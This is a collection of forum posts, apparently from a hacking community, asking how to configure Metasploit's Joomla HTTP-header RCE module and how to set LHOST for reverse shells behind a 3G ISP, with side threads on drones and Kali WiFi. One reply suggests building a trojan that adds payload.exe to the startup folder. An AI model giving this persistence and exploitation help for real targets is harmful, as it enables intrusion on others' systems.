[Metasploit help]

look for a program wrapper to force add to startup programs

What i think you want is a trojan

option 2

You can create a batch file to autoamtically create a shortcut of the payload.exe to the default startup folder location

and then merge the batch file with the virus

[Setting Options in HTTP exploit on METASPLOIT]

@cooper

Thanks for replying

can you be a little specific about your answer.

Let me explain my scenario a bit in detail.

http://www.joomla-target.com/joomla/ is hosted on a VPS with this ip 1.2.3.4 along with some other few websites.

So will the setting be:

Name Current Setting Required Description

---- --------------- -------- -----------

HEADER USER-AGENT yes The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR)

Proxies no A proxy chain of format type:host:port[,type:host:port][...]

RHOST 1.2.3.4 yes The target address

RPORT 80 yes The target port

SSL false no Negotiate SSL/TLS for outgoing connections

TARGETURI /joomla/ yes The base path to the Joomla application

VHOST http://www.joomla-target.com no HTTP server virtual host

or

Name Current Setting Required Description

---- --------------- -------- -----------

HEADER USER-AGENT yes The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR)

Proxies no A proxy chain of format type:host:port[,type:host:port][...]

RHOST 1.2.3.4 yes The target address

RPORT 80 yes The target port

SSL false no Negotiate SSL/TLS for outgoing connections

TARGETURI /joomla/ yes The base path to the Joomla application

VHOST www.joomla-target.com no HTTP server virtual host

I hope I am not asking too much.

[Drones.]

I thing I finally found what you were looking for here is the youtube video on the hak5 site: https://hak5.org/episodes/hak5-1802

on youtube here:https://www.youtube.com/watch?v=x8BsfUqCK8E

[Drones.]

Searching hak 5 with drone tags gave me this

https://hak5.org/tag/drone

https://www.youtube.com/watch?v=Fk1Bpy5ccPU

https://www.youtube.com/watch?v=vq2HP9sGPgQ

[Setting Options in HTTP exploit on METASPLOIT]

I am trying to exploit the common joomla CMS application.

Here is some info on the exploit.

https://www.rapid7.com/db/modules/exploit/multi/http/joomla_http_header_rce

To use the exploit in msfconsole

type :

use exploit/multi/http/joomla_http_header_rce

So here comes my question.

In the options for the exploit comes my problem

show options
​###output below###

Name Current Setting Required Description

---- --------------- -------- -----------

HEADER USER-AGENT yes The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR)

Proxies no A proxy chain of format type:host:port[,type:host:port][...]

RHOST 1.2.3.4 yes The target address

RPORT 80 yes The target port

SSL false no Negotiate SSL/TLS for outgoing connections

TARGETURI / yes The base path to the Joomla application

VHOST no HTTP server virtual host

My problem is the VHOST setting.I do under stand what virtual host is( I think it is when one ip is used to host multiple domain names)

Imagine this scenario:

target website running joomla is http://www.joomla-target.com/joomla/ on port 80

domain is hosted on 1.2.3.4

but 1.2.3.4:80 is not the same as http://www.joomla-target.com:80 (<--my virtual host understanding)

I hope you have understood the scenario:

So what will be the options for

RHOST

TARGETURI

VHOST

RPORT

Please help.

Thanks in advance.

[Drones.]

I am not sure which drone the used but here are some common preassembled drones

DJI Phantom 2:http://buyadrone.ga/shop/toys-and-games/dji-phantom-2-quadcopter-v2-0-bundle-3-axis-zenmuse-h4-3d-gimbal-for-gopro-hero-4-black-white/

DJI PHANTOM 3 :http://buyadrone.ga/shop/toys-and-games/hobbies/rc-vehicles-and-parts/rc-vehicles/quadcopters-and-multirotors/electronics/dji-phantom-3-professional-limited-edition-carbon-fiber-color-bundle-kit-includes-1-battery-and-a-hard-case-and-carbon-fiber-propellers-quadcopter-drone-w-4k-uhd-video-camera/

[Kali Linux -- WiFi connection?]

what do you get when you type this command on the terminal

ifconfig wlan0

If u can get a wired internet connect you can run some updates by typing this on the terminal.

sudo apt-get update
sudo apt-get upgrade

[Setting up LHOST on Metasploit when using 3G network for remote exploits]

Thaaaaaaaaaaaanks so much phpsystems, you are a life saver.ssh remote tunneling helped I didn't know you could use it to do so many things.

[Setting up LHOST on Metasploit when using 3G network for remote exploits]

Thanks phpsytems, for sharing

I will try that : watching the video now

Here is a small snip from ipconfig /all command when using a 3g USB dongle

Connection-specific DNS Suffix . :

Description . . . . . . . . . . . : HUAWEI Mobile Connect - Network Adapter #2

Physical Address. . . . . . . . . : 58-2C-80-13-92-XX

DHCP Enabled. . . . . . . . . . . : Yes

Autoconfiguration Enabled . . . . : Yes

Link-local IPv6 Address . . . . . : fe80::8c28:ca02:bfe3:648c%5(Preferred)

IPv4 Address. . . . . . . . . . . : 154.122.xxx.71(Preferred)

Subnet Mask . . . . . . . . . . . : 255.255.255.240

Lease Obtained. . . . . . . . . . : Saturday, January 30, 2016 11:19:06 AM

Lease Expires . . . . . . . . . . : Friday, February 5, 2016 11:19:07 AM

Default Gateway . . . . . . . . . : 212.49.xxx.22

154.122.xxx.65

DHCP Server . . . . . . . . . . . : 154.122.xxx.65

DHCPv6 IAID . . . . . . . . . . . : 794307712

DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-1E-3D-7B-3D-58-2C-80-11-91-08

DNS Servers . . . . . . . . . . . : 212.49.xxx.22

196.202.xxx.45

At the time my IP whatismyip.com was 154.122.xxx.65 the same as my (DHCP server and Gateway) but different from my IPv4 address

I will check back , and inform you if the ssh solution worked.

[Setting up LHOST on Metasploit when using 3G network for remote exploits]

I am not quite sure what "actual IP" or "remote IP" means, but doing a google search for my Ip address I get this 154.122.xxx.xxx (I am guessing this is my remote ip) that same IP is what I get running an network analyzer tool on my android.When running trace route (on google.com) commands something different happens

1st hop ***10.36.xxx.xxx I guess this one is my isp router

2nd hop ***10.36.xxx.xxx I guess this one is another my isp router

3rd hop ***212.49.xxx.xxx this one shows my isp domain name

4th hop ***10.xxx.xxx.xxx

-----some other more gateways

BTW I tried accessing the router pages no luck.

phpsystems:do you have any references or walkthrough guides for VPNs or SSH tunnelling to listen to a port.

[Setting up LHOST on Metasploit when using 3G network for remote exploits]

I am also looking into blocked ports work around solutions, if any you now of a good one let me know.

[Setting up LHOST on Metasploit when using 3G network for remote exploits]

That didn't or won't work because the 192.168.x.x network is for the local network for me that is the network between my phone to my computer(Tether network).Thanks for trying. I am also looking for ways to unblock port which are blocked by default.

[Setting up LHOST on Metasploit when using 3G network for remote exploits]

I am a kind of a noob on this one.

I have this question.

I share internet through tethering using my phone which is connected through the internet through the 3G network.

I dont have any other way of accessing the internet, so no cable or wired connections.

In the options for setting up an exploit in metasploit the LHOST option will not work if I set my public ip.

This is because my ISP filters all incoming requests on all ports (The router is located at their site, no access).I would like to know if their is a way I could work around this, prefarably a free method.I already know I can use a VPS (Virtual Private Server) but thats expensive.

Possible noobie solutions:proxies,VPNs.If this is a solution I would like to know how to setup the LPORT and LHOST.

I am sorry if this has a simple answer.

Environment: Kali linux version on VMware workstation--->Hosted on a windows machine

Please help